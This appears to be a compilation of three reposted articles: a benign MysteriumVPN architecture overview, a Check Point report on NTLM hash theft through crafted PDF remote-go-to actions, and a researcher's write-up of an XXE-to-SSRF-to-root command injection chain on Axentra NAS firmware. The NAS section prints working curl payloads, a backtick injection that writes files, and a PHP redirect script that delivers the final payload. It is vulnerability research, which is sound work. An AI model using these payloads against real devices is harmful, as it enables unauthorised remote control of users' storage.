A look under the hood of a decentralised VPN Application.

( Original text by Donatas Kučinskas )

MysteriumVPN is the client application of Mysterium Network, a project focused on providing security and privacy to web 3 applications.

In this article, we will discuss the architecture of MysteriumVPN and how it integrates with Mysterium Node to ensure an end-to-end encrypted flow of data through Mysterium Network.

Cross-platform architecture

Usually, you need separate builds for each platform. Now that cross-platform technology has improved, this is no longer the case.

For desktop:

Electron is a framework that allows us to build cross-platform applications using common web technologies such as HTML, CSS and JavaScript. Using Electron, we develop one desktop application for two platforms, Windows and macOS, with Linux coming soon. Download our alpha.

Under the hood of an Electron application sits a Chromium browser: the application is essentially a website rendered by an embedded browser.

For mobile:

We are kicking off our mobile development for MysteriumVPN, with Android versions set to release shortly.

For this, we are using React Native for cross-platform applications.

Most of MysteriumVPN is written in JavaScript, which runs in a separate process. JavaScript generates the virtual structure of the user interface. This JavaScript process communicates with native mobile processes, which are responsible for rendering the actual user interface as you see it.

The architecture of MysteriumVPN Desktop Client Application

How MysteriumVPN works on desktop:

Since we are using Electron, we have two processes, MAIN and RENDERER.

MAIN is the first process which is started when the application starts. It is a NodeJS process which is responsible for managing the following functions:

  • Application state and internal operations
  • Tray
  • Kicking off the RENDERER process

The second process is RENDERER and it is responsible for displaying the graphical user interface for the application.

Communication between processes:

Both the MAIN and RENDERER processes need to communicate with each other to stay in sync. For this reason, we are using a standard approach of Inter-Process Communication (IPC).

JavaScript is not type-safe, which makes it less reliable. We use the Flow static type checker, which adds type safety to JavaScript. This matters most when syncing data between processes, which becomes less reliable with out-of-the-box IPC. To improve on that, we use IPC with a custom implementation on top that provides type safety.

MessageTransport describes a single typed message which is sent between processes. It creates alignment between both processes by introducing sender and receiver objects, ensuring that both sides expect the same arguments of this message.

Here is an implementation:

// A single typed message channel shared by both processes.
class MessageTransport<T> {
  _channel: string
  _messageBus: MessageBus

  constructor (channel: string, messageBus: MessageBus) {
    this._channel = channel
    this._messageBus = messageBus
  }

  buildSender (): MessageSender<T> {
    return new MessageSender(this._channel, this._messageBus)
  }

  buildReceiver (): MessageReceiver<T> {
    return new MessageReceiver(this._channel, this._messageBus)
  }
}

// Sends payloads of type T over the channel.
class MessageSender<T> {
  _channel: string
  _messageBus: MessageBus

  constructor (channel: string, messageBus: MessageBus) {
    this._channel = channel
    this._messageBus = messageBus
  }

  send (data: T) {
    this._messageBus.send(this._channel, data)
  }
}

// Subscribes to payloads of type T arriving on the channel.
class MessageReceiver<T> {
  _channel: string
  _messageBus: MessageBus

  constructor (channel: string, messageBus: MessageBus) {
    this._channel = channel
    this._messageBus = messageBus
  }

  on (callback: T => void) {
    this._messageBus.on(this._channel, callback)
  }

  removeCallback (callback: T => void) {
    this._messageBus.removeCallback(this._channel, callback)
  }
}

Here is an example of communication between the MAIN and RENDERER processes:

Example: communicating country proposal updates between processes:

The MAIN process manages country proposals internally and sends all updates:

this._countryList.onUpdate(countries => {
  this._communication.countryUpdate.send(countries)
})

The RENDERER process listens for country updates:

this.rendererCommunication.countryUpdate.on(this.onCountriesUpdate)
...
onCountriesUpdate (countries) {
  this.countriesAreLoading = false
  this.countryList = countries
}

Having such an abstraction layer ensures that communication is type-safe, reliable and features around it are simple to test.
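To illustrate the testability claim, here is a minimal sketch of the same idea in Python, with type hints standing in for Flow annotations. The `InMemoryBus` class and the `country.update` channel name are assumptions made for this example, not part of MysteriumVPN, and the sender and receiver roles are folded into one class to keep it short.

```python
from typing import Callable, Dict, Generic, List, TypeVar

T = TypeVar("T")


class InMemoryBus:
    """Hypothetical stand-in for the real IPC bus: calls subscribers synchronously."""

    def __init__(self) -> None:
        self._callbacks: Dict[str, List[Callable]] = {}

    def send(self, channel: str, data: object) -> None:
        # Copy the list so a callback may unsubscribe while we iterate.
        for callback in list(self._callbacks.get(channel, [])):
            callback(data)

    def on(self, channel: str, callback: Callable) -> None:
        self._callbacks.setdefault(channel, []).append(callback)

    def remove_callback(self, channel: str, callback: Callable) -> None:
        self._callbacks[channel].remove(callback)


class MessageTransport(Generic[T]):
    """One channel whose sending and receiving sides agree on the payload type T."""

    def __init__(self, channel: str, bus: InMemoryBus) -> None:
        self._channel = channel
        self._bus = bus

    def send(self, data: T) -> None:
        self._bus.send(self._channel, data)

    def on(self, callback: Callable[[T], None]) -> None:
        self._bus.on(self._channel, callback)

    def remove_callback(self, callback: Callable[[T], None]) -> None:
        self._bus.remove_callback(self._channel, callback)


# A test needs no real processes: wire both ends to the in-memory bus.
bus = InMemoryBus()
country_update: MessageTransport[List[str]] = MessageTransport("country.update", bus)

received: List[List[str]] = []
handler = received.append
country_update.on(handler)
country_update.send(["LT", "DE"])

country_update.remove_callback(handler)
country_update.send(["US"])  # no subscriber left, so this is not recorded

print(received)
```

Because the transport only depends on the bus interface, a test can swap the real IPC layer for a fake one and assert on what was delivered.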

How do we integrate Mysterium Node with MysteriumVPN Application?

Once we’ve rendered the application layer, we still need to connect MysteriumVPN to Mysterium Node. Mysterium Node is software that connects you to Mysterium Network, where you are able to exchange value for bandwidth.

MysteriumVPN is a client application of Mysterium Network. The successful running of our dVPN on the network will attract other use cases from existing or future businesses that require end-to-end encryption of data, thereby expanding Mysterium Network’s ecosystem.

We require specific information to ensure the successful running of our dVPN service.

Operating System Service
Since we are running Mysterium Node under the MysteriumVPN application, we need to supervise Mysterium Node to ensure that it works.

Our Data Protection Policy
We make a clear distinction between personal data and usage data. We do not collect information on who you are. We collect data on session and connection inputs and outputs. This is important data for us as it gives us visibility on how our technology fares against the realities of cyber oppression. Check out our privacy policy for more information.

Logging
Since we are integrating Mysterium Node into the MysteriumVPN application, the application itself gets quite complex. That’s why we have to be prepared to log errors from everywhere: our application, Mysterium Node, and Electron.

That means that there are three sources of inputs. When we are inspecting something, we need to understand that these errors can happen in three different places. We need to synchronise those and collect all relevant data from these sources.
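As a rough illustration of what synchronising three log sources can look like, the sketch below merges three time-ordered streams into one timeline. The `LogEntry` shape, the timestamps and the messages are invented for the example; the article does not describe how MysteriumVPN actually stores or merges its logs.

```python
import heapq
from typing import Iterable, Iterator, NamedTuple


class LogEntry(NamedTuple):
    timestamp: float  # seconds since some shared reference point (assumed)
    source: str
    message: str


def merge_logs(*streams: Iterable[LogEntry]) -> Iterator[LogEntry]:
    """Merge streams that are each already time-ordered into one ordered stream."""
    return heapq.merge(*streams, key=lambda entry: entry.timestamp)


# Made-up sample entries from the three places where errors can occur.
app = [LogEntry(1.0, "app", "connect clicked"), LogEntry(4.0, "app", "connection failed")]
node = [LogEntry(2.0, "node", "session requested"), LogEntry(3.5, "node", "tunnel error")]
electron = [LogEntry(3.0, "electron", "renderer warning")]

timeline = list(merge_logs(app, node, electron))
for entry in timeline:
    print(f"{entry.timestamp:>5.1f} [{entry.source}] {entry.message}")
```

Reading the merged timeline makes it easier to see which source reported a problem first.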

Data management in the era of web 3 is complex and we hope to do so in an ethical and fair manner. Check out how our no logs policy protects your personal data.

Build on Mysterium Network

We have an npm package that allows you to connect to Mysterium Node easily. This is the same package that MysteriumVPN uses to connect to Mysterium Network. It can be used for any application; it’s literally plug and play.

Interested in contributing to Mysterium Network? We are an open source project focused on bringing privacy, security and freedom to web 3. Check out our GitHub.


NTLM Credentials Theft via PDF Files

( Original text by research.checkpoint.com )

Just a few days after it was reported that malicious actors can exploit a vulnerability in MS Outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can reveal that NTLM hash leaks can also be achieved via PDF files, with no user interaction or exploitation.

According to Check Point researchers, rather than exploiting the vulnerability in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can use this to inject malicious content into a PDF, so that when the PDF is opened, the target automatically leaks credentials in the form of NTLM hashes.

PDF Background

A PDF file consists primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects:

  • Boolean values
  • Integers and real numbers
  • Strings
  • Names
  • Arrays
  • Streams
  • The null object
  • Dictionaries

A dictionary object is a table containing pairs of objects, called entries.  The first element of each entry is the key and the second element is the value. The key must be a name, and the value may be any kind of object, including another dictionary. The pages of a document are represented by dictionary objects called page objects.  The page objects consist of several required and optional entries.

Proof of Concept

The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry).  The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:

  • /S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
  • /F entry: Exists in GoToR and GoToE, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.
  • /D entry: Describes the location to go to within the document.

By injecting a malicious entry (using the fields described above, together with their SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file, which then automatically leaks their NTLM hash, challenge, user, host name and domain details.
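From a defender’s point of view, the entries described above suggest a simple triage check: look for GoToR or GoToE actions whose /F file specification starts like a UNC path. The sketch below is a heuristic over raw bytes, not a PDF parser; it will miss actions hidden in compressed object streams or written as hex strings. The sample dictionary and the host name `attacker.example` are made up for the example.

```python
import re
from typing import List

# "/S /GoToR" or "/S /GoToE": the action types that jump to another PDF file.
REMOTE_ACTION = re.compile(rb"/S\s*/(GoToR|GoToE)\b")
# "/F (" followed by two or more backslashes, i.e. something shaped like \\host\share.
UNC_FILE_SPEC = re.compile(rb"/F\s*\(\s*\\{2,}")

WINDOW = 256  # bytes inspected on each side of the action type (arbitrary choice)


def find_remote_smb_actions(pdf_bytes: bytes) -> List[bytes]:
    """Return the action type of every GoToR/GoToE found near a UNC-style /F entry."""
    hits = []
    for match in REMOTE_ACTION.finditer(pdf_bytes):
        start = max(0, match.start() - WINDOW)
        window = pdf_bytes[start:match.end() + WINDOW]
        if UNC_FILE_SPEC.search(window):
            hits.append(match.group(1))
    return hits


# Hypothetical page object with an /AA entry that opens a remote file on page open.
suspicious = rb"""
<< /Type /Page
   /AA << /O << /S /GoToE /F (\\\\attacker.example\\share) /D [0 /Fit] >> >>
>>
"""
harmless = rb"<< /Type /Page /AA << /O << /S /GoTo /D [0 /Fit] >> >> >>"

print(find_remote_smb_actions(suspicious))
print(find_remote_smb_actions(harmless))
```

A hit is only a reason to inspect the file more closely, since legitimate documents can also link to other PDFs.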

Figure 1: PoC – Injected GoToE action.

In addition, from the target’s perspective there is no evidence or any security alert of the attacker’s activity, which makes it impossible to notice abnormal behavior.

Figure 2: The crafted PDF file has no evidence of the attacker’s actions.

The NTLM details are leaked through SMB traffic and sent to the attacker’s server, where they can be used to mount various SMB relay attacks.

Figure 3: The Leaked NTLM details after the crafted PDF is opened.

 

Affected Products and Mitigation

Our investigation led us to conclude that all Windows PDF viewers are vulnerable to this security flaw and will reveal the NTLM credentials.

Disclosure

The issue was disclosed both to Adobe and Foxit.

Foxit fixed the issue as part of the 9.1 release.

Adobe fixed the vulnerability as part of the Adobe Reader version released in May (CVE-2018-4993).

IPS Prevention

Check Point customers are protected by the IPS protection:

Multiple PDF readers NTLMv2 Credential Theft

We would also like to thank our colleagues, Assaf Baharav, Yaron Fruchtmann, and Ido Solomon for their help in this research.

zero-day RCE crafted from a tricky XXE, affecting millions of users on NetGear Stora, SeaGate Home, & Medion LifeCloud NAS

( Original text by Paulos Yibelo )

TL;DR: Not long ago, right after hearing that California is raising its eyebrows at internet-connected device security, Daniel Eshetu and I were exploring the current security state of popular Network Attached Storage (NAS) devices. The California Consumer Privacy Act, which influenced such measures, requires manufacturers to have hardened, above-average enterprise security, enforcing unusual care for devices, mainly the so-called internet-connected “IoT” devices. In my opinion, such security standards should be mandatory for devices that spread so rapidly, especially if they are mandated correctly and put manufacturers on the spot for not caring.

So while dissecting the firmware of the first NAS, it became clear we weren’t dealing with one of those easy-to-compromise kumbaya codebases. Axentra had clean code, no obvious backdoors, and even had proper security measures in case something should go wrong. Looking online, about 2 million of these NAS devices can be found. An interesting target: widespread, with a good codebase. Our research was supported by the privacy advocate WizCase.

This is a prolonged post detailing how it was possible to craft an RCE exploit from a tricky XXE and SSRF.

About Axentra.

Axentra Hipserv is a NAS OS that runs on multiple devices from different vendors, including NetGear Stora, SeaGate Home and Medion LifeCloud NAS, and provides cloud-based login, file storage, and management functionalities. The company provides firmware with a web interface that mainly uses PHP as a backend. The web interface has a REST API endpoint and a fairly typical web management interface with file manager support.

Firmware Analysis.  

After extracting the firmware using binwalk, the backend sources were located in /var/www/html/, with the webroot in /var/www/html/html. The main handler for the web interface is homebase.php, and RESTAPIController.php is the main handler for the REST API. All the PHP files were encoded using IONCube, which has a public decoder, and given that the version used was an old one, decoding the files didn’t take long.

Once the files were decoded we proceeded to look at the source code, most of which was well written. During the initial analysis we looked at different configuration files which we thought might come into play. One of them was php.ini, located in /etc, which contained the configuration line ‘register_globals=on’. This was pretty exciting, as turning register_globals on is a very insecure configuration and could lead to a plethora of vulnerabilities. But looking through the entire source code, we could not find any chunk of code exploitable through this method. The Axentra code, as mentioned before, was well written, and variables were properly initialized, used and carefully checked, so register_globals was not going to work.

As we kept looking through the source code and moved on to the REST API endpoint, things got a little more interesting. The initial requests are routed through RESTAPIController.php, which loads the proper classes from /var/www/html/classes/REST, and the service classes were in /var/www/html/classes/REST/services in individual folders. While looking through the services, most of them were properly authenticated, but there were a few exceptions. One of these was the request aggregator endpoint, located at /www/html/classes/REST/services/aggregator in the filesystem and at /api/2.0/rest/aggregator/xml from the web URL. We will look at how this service works and how we were able to exploit it.

The first file in the directory was AxAggregatorRESTService.php. This file defines and constructs the rest service. Files of the same structure exist in every service directory with different names ending with the same RESTService.php suffix. In this file there were interesting lines (shown below). Note that line numbers might be inaccurate since the files were decoded and we didn’t bother to remove the header generated by the decoder (a block of comment at the beginning of each file plus random breaks).

JUICE A: /var/www/html/classes/REST/services/aggregator/AxAggregatorRESTService.php

line 13: private $requiresAuthenticatedHipServUser = false; // This shows the service does not require authentication.
line 14: private $serviceName = 'aggregator'; // The service name.

line 17-18:
if (( count( $URIArray ) == 1 && $URIArray[0] == 'xml' )) { // If the number of URI paths passed to the service is 1 and the first path is xml
    $resourceClassName = $this->loadResourceClass( 'XMLAggregator' ); // Load the resource class XMLAggregator

The code on line 18 calls a function called loadResourceClass, which is provided by Axentra’s REST API framework and loads a resource (service handler) class/file from the current REST services directory after adding the appropriate prefix (Ax) and suffix (RESTResource.php). The code for this function is shown below.

classes/REST/AxAbstractRESTService.php

line 25-30:
function loadResourceClass($resourceName) {
    $resourceClassName = 'Ax' . $this->resourcesClassNamePrefix . ucfirst( $resourceName ) . 'RESTResource';
    require_once( REST_SERVICES_DIR . $this->serviceName . '/' . $resourceClassName . '.php' );
    return $resourceClassName;
}
}

The next file we had to look at was AxXMLAggregatorRESTResource.php which is loaded and executed by the REST framework. This file defines the functionality of the REST API endpoint, inside of it is where our first bug was found (XXE). Let’s take a look at the code.

/var/www/html/classes/REST/services/aggregator/AxXMLAggregatorRESTResource.php

line 14:
$mDoc = new DOMDocument(); // Initialize a DOMDocument loader class

line 16:
if (( ( ( $requestBody == '' || !$mDoc->loadXML( $requestBody, LIBXML_NOBLANKS ) ) || !$mRequestsNode = $mDoc->documentElement ) || $mRequestsNode->nodeName != 'requests' )) {
    throw new AxRecoverableErrorException( null, 3 );
}

As you can see on the 16th line, this file loads XML from the user without validation. Most PHP programmers and security researchers would argue this is not vulnerable, since external entity loading is disabled in libxml by default and the code never calls libxml_disable_entity_loader(false). One thing to note, however, is that the Axentra firmware uses the libxml library to parse XML data, and libxml only started disabling external entity loading by default in libxml2 version 2.9. Axentra’s firmware has version 2.6, which does not disable external entity loading by default, and this leads to an XXE attack. The following request was used to test the XXE.

curl command with output:

Command:

curl -kd '<?xml version="1.0"?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM "http://SolarSystem:9091/XXE_CHECK"> %dtd; ]> <requests> <request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request> </requests>' http://axentra.local/api/2.0/rest/aggregator/xml

Output:

<?xml version="1.0"?>
<responses>
<response method="GET" href="/api/2.0/rest/3rdparty/facebook/">
<errors><error code="401" msg="Unauthorized"/></errors>
</response>
</responses>%

which produced the following on our listening server:

root@Server:~# nc -lvk 9091
Listening on [0.0.0.0] (family 0, port 9091)
Connection from [axentra.local] port 9091 [tcp/*] accepted (family 2, sport 41528)
GET /XXE_CHECK HTTP/1.0
Host: SolarSystem:9091

^C
root@Server:~#
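The request above only works because the parser accepts a DOCTYPE with an external entity. A service that never needs DTDs can refuse them outright before any entity is processed. The following is a minimal defensive sketch in Python (not the firmware’s PHP); the function name and the exception class are made up for the example.

```python
import xml.parsers.expat
from typing import List


class DoctypeForbidden(ValueError):
    """Raised when a request body carries a DOCTYPE declaration."""


def parse_without_doctype(body: str) -> List[str]:
    """Return element names in document order, refusing any DOCTYPE."""
    names: List[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat when it meets <!DOCTYPE ...>; raising aborts the parse.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(body, True)
    return names


benign = '<?xml version="1.0"?><requests><request href="/x" method="GET"></request></requests>'
hostile = (
    '<?xml version="1.0"?><!DOCTYPE requests [ <!ENTITY % dtd SYSTEM '
    '"http://SolarSystem:9091/XXE_CHECK"> %dtd; ]><requests></requests>'
)

print(parse_without_doctype(benign))
try:
    parse_without_doctype(hostile)
except DoctypeForbidden as error:
    print("rejected:", error)
```

Rejecting the declaration itself is stricter than disabling entity loading, which suits an endpoint that only ever expects a plain list of requests.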

Now that we had XXE working, we could try to read files and dig out sensitive info, but ultimately we wanted full remote control. The first thought was to extract the SQLite database containing all usernames and passwords, but this turned out to be a no-go, since XXE and binary data don’t work well together; even encoding the data using PHP filters would not work. And since this method would have required another RCE in the web interface to take full control of the device, we thought of trying something new.

Since we could make a request from the device (SSRF), we tried to locate endpoints that bypass authentication if the request comes from localhost (a very common issue/feature?). However, we could not find any good ones, so we moved into the internals of the NAS system, specifically how the system executes commands as root (privileged actions). This might not have been worth looking at if the user ID the web server runs as had some sort of sudo privilege, but this was not the case. Since we had seen this during our initial look at the firmware, we knew the system was executing commands some other way. After a few minutes of searching we found a daemon that the system uses to execute commands, and PHP scripts that communicate with this daemon. We will look at the details below.

The requests to this daemon are sent in XML format by code located in /var/www/html/classes/AxServerProxy.php, which calls a function named systemProxyRequest to send the requests. systemProxyRequest is located in the same file, and its code is given below.

/var/www/html/classes/AxServerProxy.php:

line 1564-1688:
function systemProxyRequest($command, $operation, $params = array(  ), $reqData = '') {
    $Proc = true;
    $host = '127.0.0.1';
    $port = 2000;
    $fp = fsockopen( $host, $port, $errno, $errstr );
    if (!$fp) {
        throw new AxRecoverableErrorException( 'Could not connect to sp server', 4 );
    }
    if ($Proc) {
        unset( $root );
        $doc = new DOMDocument( '1.0' );
        $root = $doc->createElement( 'proxy_request' );
        $cmdNode = $doc->createElement( 'command_name' );
        $cmdNode->appendChild( $doc->createTextNode( $command ) );
        $root->appendChild( $cmdNode );
        $opNode = $doc->createElement( 'operation_name' );
        $opNode->appendChild( $doc->createTextNode( $operation ) );
        $root->appendChild( $opNode );

        if ($reqData[0] == '<') {
            if (substr( $reqData, 0, 5 ) == '<?xml') {
                $reqData = preg_replace( '/<\?xml.*?\?>/', '', $reqData );
            }

            $reqDoc = new DOMDocument(  );
            $reqData = str_replace( '', '', $reqData );
            $reqDoc->loadXML( $reqData );
            $mNewNode = $doc->importNode( $reqDoc->documentElement, true );
            $dNode->appendChild( $mNewNode );
        }
        ….
        $root->appendChild( $dNode );
    }
    if ($root) {
        $doc->appendChild( $root );
        fputs( $fp, $doc->saveXML(  ) . '' );
    }

    $Resp = '';
    stream_set_timeout( $fp, 120 );
    while (!feof( $fp )) {
        $Resp .= fread( $fp, 1024 );
        $info = stream_get_meta_data( $fp );

        if ($info['timed_out']) {
            return array( 'return_code' => 'FAILURE', 'description' => 'System Proxy Timeout', 'error_code' => 4, 'return_message' => '', 'return_value' => '' );
        }
    }

As seen above, the function takes XML data, cleans out a few things like spaces, and sends it to the daemon listening on port 2000 of the local machine. The daemon is located at /sbin/oe-spd and is a binary file, so we looked into it using IDA. The following pieces of code were generated by the Hex-Rays decompiler in IDA.

In function sub_A810:

This function receives the data from the socket as an argument (a2) and parses it.

JUICE B:

signed int __fastcall sub_A810(int a1, const char **a2) line 52:

v10 = strstr(*v3, "<?xml version=\"1.0\"?>"); // strstr skips over junk data until the requested string is found (<?xml version="1.0"?>)

The line above is important to us mainly because the request is sent over HTTP, so the daemon’s “feature” of skipping over junk data allows us to embed our payload in an HTTP request to http://127.0.0.1:2000 (the daemon’s port) without worrying about formatting or the daemon bailing because of unknown characters; it does the same thing with junk data after the XML too.
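The effect of that substring search can be sketched in a few lines of Python. This only models the behaviour described above (find the XML prolog anywhere in the buffer); the function names and the sample request are illustrative, and the strict variant is an assumed alternative, not something the daemon implements.

```python
from typing import Optional

PROLOG = b'<?xml version="1.0"?>'


def lenient_extract(raw: bytes) -> Optional[bytes]:
    """Model of the strstr-style search: everything before the prolog is ignored."""
    start = raw.find(PROLOG)
    return None if start == -1 else raw[start:]


def strict_extract(raw: bytes) -> Optional[bytes]:
    """Assumed stricter alternative: the message must begin with the prolog."""
    return raw if raw.startswith(PROLOG) else None


# An HTTP request is just "junk" followed by the XML body from the daemon's view.
http_request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 127.0.0.1:2000\r\n"
    b"\r\n"
    b'<?xml version="1.0"?><proxy_request><command_name>usb</command_name></proxy_request>'
)

print(lenient_extract(http_request))
print(strict_extract(http_request))
```

With the lenient search, any protocol that can carry the XML somewhere in its bytes becomes a valid way to talk to the daemon, which is what makes the SSRF useful.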

We skipped over looking into how the whole oe-spd daemon code works, mainly because we had our sights set on finding and exploiting a simple RCE bug, and we had all we needed to test a few ways of achieving that: we had the format of the messages from AxServerProxy.php and some from usr/lib/spd/scripts/. The method we used to find the RCE was sending the request through curl and tracing the process with strace while running in a qemu environment. This helped us filter out execve calls with the right parameters to use as a payload. As a note, there were A LOT of vulnerable functions in this daemon, but in the following we only show the one we used to achieve RCE. Those of you who are interested can explore the daemon using the hints we gave above.

curl command and response:

curl -vd '<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">BOGUS_DEVICE</parameter></proxy_request>' http://127.0.0.1:2000/
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 2000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:2000
> User-Agent: curl/7.61.1
> Accept: */*
> Content-Length: 179
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 179 out of 179 bytes

<?xml version="1.0"?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code="SUCCESS" description="Operation successful" />
</proxy_return>

strace command and output

sudo strace -f -s 10000000 -q -p 2468 -e execve
[pid  2510] execve("/usr/lib/spd/usb", ["/usr/lib/spd/usb"], 0x63203400 /* 22 vars */ <unfinished ...>
[pid  2511] +++ exited with 0 +++
[pid  2510] <... execve resumed> )      = 0
[pid  2513] execve("/bin/sh", ["sh", "-c", "/usr/lib/spd/scripts/usb/usbremoveall /dev/BOGUS_DEVICE manual"], 0x62c67f10 /* 22 vars */ <unfinished ...>
[pid  2514] +++ exited with 0 +++
[pid  2513] <... execve resumed> )      = 0
[pid  2513] execve("/usr/lib/spd/scripts/usb/usbremoveall", ["/usr/lib/spd/scripts/usb/usbremoveall", "/dev/BOGUS_DEVICE", "manual"], 0x62a65800 /* 22 vars */ <unfinished ...>
[pid  2515] +++ exited with 0 +++
[pid  2513] <... execve resumed> )      = 0
[pid  2517] execve("/bin/sh", ["sh", "-c", "grep /dev/BOGUS_DEVICE /etc/mtab"], 0x63837f80 /* 22 vars */ <unfinished ...>
[pid  2518] +++ exited with 0 +++
[pid  2517] <... execve resumed> )      = 0
[pid  2517] execve("/bin/grep", ["grep", "/dev/BOGUS_DEVICE", "/etc/mtab"], 0x64894000 /* 22 vars */ <unfinished ...>
[pid  2519] +++ exited with 0 +++
[pid  2517] <... execve resumed> )      = 0
[pid  2520] +++ exited with 1 +++
[pid  2517] +++ exited with 1 +++
[pid  2513] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2517, si_uid=0, si_status=1, si_utime=4, si_stime=3} ---
[pid  2516] +++ exited with 1 +++
[pid  2513] +++ exited with 1 +++
[pid  2510] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2513, si_uid=0, si_status=1, si_utime=16, si_stime=6} ---
[pid  2512] +++ exited with 0 +++
[pid  2510] +++ exited with 0 +++
[pid  2508] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2510, si_uid=0, si_status=0, si_utime=4, si_stime=1} ---
[pid  2509] +++ exited with 1 +++
[pid  2508] +++ exited with 1 +++

The command execution bug should be clearly visible here, but in case you missed it, the 4th line in the strace output shows our input (BOGUS_DEVICE) being passed to a /bin/sh call. Now we send a test injection to see if our command execution works.

curl command and output:

curl -vd '<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">`echo pwnEd`</parameter></proxy_request>' http://127.0.0.1:2000/

<?xml version="1.0"?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code="SUCCESS" description="Operation successful" />
</proxy_return>

Strace output:

[pid  2550] execve("/usr/lib/spd/usb", ["/usr/lib/spd/usb"], 0x63203400 /* 22 vars */ <unfinished ...>
[pid  2551] +++ exited with 0 +++
[pid  2550] <... execve resumed> )      = 0
[pid  2553] execve("/bin/sh", ["sh", "-c", "/usr/lib/spd/scripts/usb/usbremoveall /dev/`echo pwnEd` manual"], 0x6291cf10 /* 22 vars */ <unfinished ...>

If you take a close look at the output, it can be seen that the “echo pwnEd” command we gave in backticks has been evaluated and the output is being used as part of a later command. To make this PoC simpler, we just write a file in /tmp and see if it exists on the device.

curl -vd '<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">dev_`id>/tmp/pwned`</parameter></proxy_request>' http://127.0.0.1:2000/
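The root cause visible in the strace output is that the disk parameter is pasted into a string that is handed to sh -c. The sketch below, in Python rather than the daemon’s own code, contrasts that pattern with two common fixes: quoting the value, or validating it and passing an argument list that never goes through a shell. The allowlist pattern for device names is an assumption made for the example.

```python
import re
import shlex
from typing import List

SCRIPT = "/usr/lib/spd/scripts/usb/usbremoveall"
DEVICE_NAME = re.compile(r"[A-Za-z0-9_]+")  # assumed allowlist for device names


def unsafe_command(disk: str) -> str:
    """The vulnerable pattern: the shell will interpret backticks inside disk."""
    return f"{SCRIPT} /dev/{disk} manual"


def quoted_command(disk: str) -> str:
    """Same shell string, but the argument is quoted so the shell treats it as data."""
    return f"{SCRIPT} {shlex.quote('/dev/' + disk)} manual"


def argv_command(disk: str) -> List[str]:
    """Preferred: validate first, then build an argv list that bypasses the shell."""
    if not DEVICE_NAME.fullmatch(disk):
        raise ValueError(f"invalid device name: {disk!r}")
    return [SCRIPT, f"/dev/{disk}", "manual"]


payload = "`echo pwnEd`"
print(unsafe_command(payload))   # backticks reach the shell unquoted
print(quoted_command(payload))   # backticks are wrapped in single quotes
print(argv_command("sdb1"))      # a plain device name passes validation
```

Passing the argv list to an exec-style call means no shell ever sees the value, so there is nothing for backticks to trigger.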

Now we have complete command execution. In order to chain this bug with our XXE and SSRF, we have to make the XML parser send a request to http://127.0.0.1:2000/ with the payload. Although sending a normal HTTP request to the daemon was not a problem, things fell apart when we tried to append the payload as a URL location in the XML file: the parser failed with an error (Invalid Url), so we had to change our approach. After a few failed attempts we figured out that the libxml HTTP client correctly follows 301/302 redirections, and this does not make the parser fail, since the URL given in the redirection does not pass through the same parser as the initial URL in the XML data. So we created a little PHP script to redirect the libxml HTTP client to http://127.0.0.1:2000/ with the payload embedded as a URL path. The script is shown below.

redir.php:

<?php
if (isset($_GET['red'])) {
    header('Location: http://127.0.0.1:2000/a.php?d=<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>""'); // 302 redirect
}
?>

Then we ran this on our server. The commands we used and the final output are given below.

curl command and output:

curl -kd '<?xml version="1.0"?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM "http://SolarSystem:9091/redir.php?red=1"> %dtd; ]> <requests> <request href="/api/2.0/rest/3rdparty/facebook/" method="GET"></request> </requests>' http://axentra.local/api/2.0/rest/aggregator/xml
<?xml version="1.0"?>
<responses>
<response method="GET" href="/api/2.0/rest/3rdparty/facebook/">
<errors><error code="401" msg="Unauthorized"/></errors>
</response>
</responses>%

root@Server:~# php -S 0.0.0.0:9091
PHP 7.0.32-0ubuntu0.16.04.1 Development Server started at Thu Nov  1 16:02:16 2018
Listening on http://0.0.0.0:9091
Document root is /root/…
Press Ctrl-C to quit.
[Thu Nov  1 16:02:43 2018] axentra.local:39248 [302]: /redir.php?red=1

As seen above, the PHP script sent a 302 (Found) response to the libxml HTTP client, which should redirect it to http://127.0.0.1:2000/a.php?d=<?xml version="1.0"?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name="disk">a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>""

The above redirection should execute our command injection and create a pwned.txt file in the webroot with the output of id. The following request checks the existence and content of the file.

curl command and output:

curl -k http://axentra.local/pwned.txt
